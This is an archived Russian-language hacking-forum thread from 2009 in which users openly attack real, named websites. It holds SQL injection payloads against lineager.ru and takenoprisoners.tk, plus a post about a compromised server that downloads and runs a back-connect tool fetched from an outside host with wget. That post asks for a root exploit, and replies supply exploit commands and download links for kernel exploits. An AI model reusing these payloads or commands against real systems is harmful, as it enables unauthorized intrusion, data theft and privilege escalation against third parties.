ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
26.09.2009, 14:22
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
С запятыми не пашет вроде
http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((sel ect+table_name+from+information_schema.tables+limi t+1+offset+1)+from+1+for+1))>1
|
|
|
26.09.2009, 14:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
http://lineager.ru/lwdb/index.php?part=items&id=1+and+5=@@version--
ЫЫ
|
|
|
|
26.09.2009, 15:16
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Сообщение от mailbrush
Если в .htaccess на все файлы стоит Forbidden, то никак.
нет отдает 404 на файлы.
--
у меня вопрос нужно запретить запуск пхп скрптов,в папке,можно сделать это через htaccess?спасибо!
-уже нашел)
Код:
RemoveHandler .php .phtml .php3
AddType application/x-httpd-php-source .php .phtml .php3
Последний раз редактировалось Shadrin; 26.09.2009 в 15:24..
|
|
|
|
26.09.2009, 15:22
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от mailbrush
Если в .htaccess на все файлы стоит Forbidden, то никак.
Есть вопрос по руту сервака. Делаю back-коннект к себе. Комманды:
Код:
cd /tmp
wget http://evilcode.hmarka.net/2.tgz
gcc run.c -O run
./run
padlina z lublina! //это выводит после запуска
id
Код:
uid=48(apache) gid=48(apache) groups=48(apache),503(nismo),504(shopua@rambler.ru),505(shopua555),506(kamar),507(geniewgen)
Т.е. сервак не порутался... Как его порутать? Есть ли сплоит какой?
Код:
Linux shopua.com.ua 2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 athlon i386 GNU/Linux
chmod 777 exploit.so;./exploit.so
ибо в твоем случае через пулсаудио файл не запустился.
--------------------------
http://fsb-my.name/c/exploit.c
http://fsb-my.name/c/pwnkernel.c
http://fsb-my.name/c/run.sh
|
|
|
|
26.09.2009, 15:54
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=1{SQL-INJ}
Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить
|
|
|
|
26.09.2009, 16:05
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533
Репутация:
43
|
|
Сообщение от wolmer
takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=1{SQL-INJ}
Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить
фак читай от джока 
|
|
|
|
26.09.2009, 16:11
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от wolmer
takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=1{SQL-INJ}
Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить
Инъекция в ORDER BY.
Сообщение от BlachSun
chmod 777 exploit.so;./exploit.so
ибо в твоем случае через пулсаудио файл не запустился.
--------------------------
http://fsb-my.name/c/exploit.c
http://fsb-my.name/c/pwnkernel.c
http://fsb-my.name/c/run.sh
Эм... Что за exploit.so и где его взять? Он в результате запуска этого эксплоита должен создаться? И что за пулсаудио (гугл говорит, что голосвая система, но это бред=\ )?
|
|
|
|
26.09.2009, 16:14
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
Сообщение от z00MAN
нет, просто ошибка базы.
ничего внедрить нельзя ошибка базы ? (
Это иньект в ордере ... только толку от него
Соре mailbrush опередил
Последний раз редактировалось S00pY; 26.09.2009 в 16:15..
Причина: mailbrush опередил
|
|
|
|
26.09.2009, 16:39
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
С запятыми не пашет вроде
http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((sel ect+table_name+from+i nformation_schema.tables+limit+1+offset+1)+from+1+ for+1))>1
а как в таком случае правильно выводить данные ? т.е. как мне узнать какому символу соответсвует запрос ?
|
|
|
|
26.09.2009, 16:57
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
По логике < >,а потом сравнением и смотрим по ascii табле символ
forum.antichat.ru/thread119047.html
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
